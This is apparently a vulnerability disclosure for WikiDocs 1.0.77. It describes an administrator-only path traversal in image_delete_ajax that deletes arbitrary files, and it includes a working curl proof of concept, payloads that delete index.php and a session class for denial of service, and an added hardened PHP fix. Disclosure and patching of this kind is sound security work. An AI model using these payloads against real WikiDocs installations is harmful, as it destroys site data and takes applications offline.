Submission #609096: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal (Info)

Title: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal
Description: The image_delete_ajax() endpoint in submit.php concatenates a user-supplied filename onto its document directory without sanitization or canonicalization, allowing an authenticated administrator to delete any file on disk that the web server user can write, via a simple path-traversal payload.

Affected Component
File: submit.php?act=image_delete_ajax
Function: image_delete_ajax()
Authentication: Requires session authentication level 2 (administrator)

Technical Details

    $document = $_POST['document'];
    $image_filename = $_POST['image_name'];
    ...
    $DOC = new Document($document);
    if(!is_dir($DOC->DIR)){ mkdir($DOC->DIR,0755,true); }
    $filename = $DOC->DIR . $image_filename;
    if (file_exists($filename)) { $image_deleted = unlink($filename); }

An admin can supply image_name=../../sensitive.php (or any other file) and have it deleted.

Proof of Concept (PoC):

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
    <url>
    <loc>http://127.0.0.1/</loc>
    <lastmod>1970-01-01T00:00:00+00:00</lastmod>
    </url>
    <url>
    <loc>http://127.0.0.1/opt</loc>
    <lastmod>1970-01-01T00:00:00+00:00</lastmod>
    </url>
    </urlset>

    ┌──(root㉿kali)-[/home/kali]
    └─# curl --path-as-is -i -s -k -X $'POST' \
      -H $'Host: 127.0.0.1' -H $'Content-Length: 38' -H $'Cache-Control: max-age=0' \
      -H $'sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"' -H $'sec-ch-ua-mobile: ?0' -H $'sec-ch-ua-platform: \"Linux\"' \
      -H $'Accept-Language: en-US,en;q=0.9' -H $'Origin: http://127.0.0.1' \
      -H $'Content-Type: application/x-www-form-urlencoded' -H $'Upgrade-Insecure-Requests: 1' \
      -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36' \
      -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
      -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' \
      -H $'Referer: http://127.0.0.1/apidocs/com/sap/engine/deploy/manager/scripts/initializations.js?auth' \
      -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
      -b $'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \
      --data-binary $'document=&image_name=../../sitemap.xml' \
      $'http://127.0.0.1/submit.php?act=image_delete_ajax'
    HTTP/1.1 200 OK
    Date: Fri, 04 Jul 2025 08:15:44 GMT
    Server: Apache/2.4.62 (Unix)
    X-Powered-By: PHP/8.3.15
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 120
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    {"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"}

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <!DOCTYPE html>
    <html lang="en">
    <head>
    ... 404 page ...

Delete application code (DoS):

    document=&image_name=../../index.php
    document=&image_name=../../classes/Session.class.php

CVSS v3.1 Assessment
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High (administrator session)
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): Low/High (arbitrary file deletion)
Availability (A): High (application DoS)

If "Integrity Low" is assumed (i.e. only non-critical files are affected), the score would be 5.5; however, the ability to delete source files could justify I:H.

Application Setup: docker run -d -p 80:80 zavy86/wikidocs

References: https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh

Credits: Discovered by Matan Sandori
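A hardened replacement for the deletion branch, added here as an example and not WikiDocs project code. It assumes the image directory is passed in as $docDir (the role $DOC->DIR plays in the snippet above); the function names safe_image_path() and image_delete_safe() and the temporary demo tree are my own.

```php
<?php
// Added hardening example, not WikiDocs project code. $docDir stands in for $DOC->DIR.

/**
 * Resolve $imageName to a file strictly inside $baseDir, or return null.
 * Two independent checks: a lexical one on the bare name, then a canonical one on the
 * resolved path, so neither "../" sequences nor symlinks can escape the directory.
 */
function safe_image_path(string $baseDir, string $imageName): ?string {
    // 1. Lexical: exactly one path component from a conservative allow-list;
    //    "." and ".." are excluded explicitly, separators and NUL bytes by the regex.
    if ($imageName === '.' || $imageName === '..'
        || !preg_match('/^[A-Za-z0-9._-]{1,255}$/', $imageName)) {
        return null;
    }
    // 2. Canonical: realpath() collapses "../" and resolves symlinks, and returns
    //    false for paths that do not exist (treated here as "not found").
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $imageName);
    if ($base === false || $target === false || !is_file($target)) {
        return null;
    }
    // The file must live directly inside the resolved base directory.
    return dirname($target) === $base ? $target : null;
}

// Hardened deletion branch: only unlink a validated path, and report the bare file
// name instead of the absolute server path the original response echoed back.
function image_delete_safe(string $docDir, string $imageName): array {
    $path = safe_image_path($docDir, $imageName);
    if ($path === null) {
        return ['error' => 'invalid image name', 'code' => 'image_not_found', 'file' => null];
    }
    $code = unlink($path) ? 'image_deleted' : 'image_delete_failed';
    return ['error' => null, 'code' => $code, 'file' => basename($path)];
}

// Demonstration on a constructed temporary tree: the traversal payload from the report
// is checked against a file one level above the image directory, then a legitimate
// image inside the directory is deleted.
$root   = sys_get_temp_dir() . '/wikidocs_demo_' . bin2hex(random_bytes(4));
$docDir = "$root/documents";
mkdir($docDir, 0755, true);
touch("$docDir/logo.png");
touch("$root/sitemap.xml");                                 // file outside the image directory
var_dump(safe_image_path($docDir, '../sitemap.xml'));       // traversal payload from the PoC
var_dump(file_exists("$root/sitemap.xml"));                 // is the outside file still there?
echo json_encode(image_delete_safe($docDir, 'logo.png')), PHP_EOL;
var_dump(file_exists("$docDir/logo.png"));                  // was the legitimate image removed?
unlink("$root/sitemap.xml"); rmdir($docDir); rmdir($root);  // clean up the demo tree
```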
User: MatanS (UID 86894)
Submitted: 2025-07-04 10:38 AM (12 months ago)
Moderation: 2025-07-13 09:28 AM (9 days later)
Status: Accepted
VulDB Entry: 316273 [Zavy86 WikiDocs up to 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax directory traversal]
Points: 17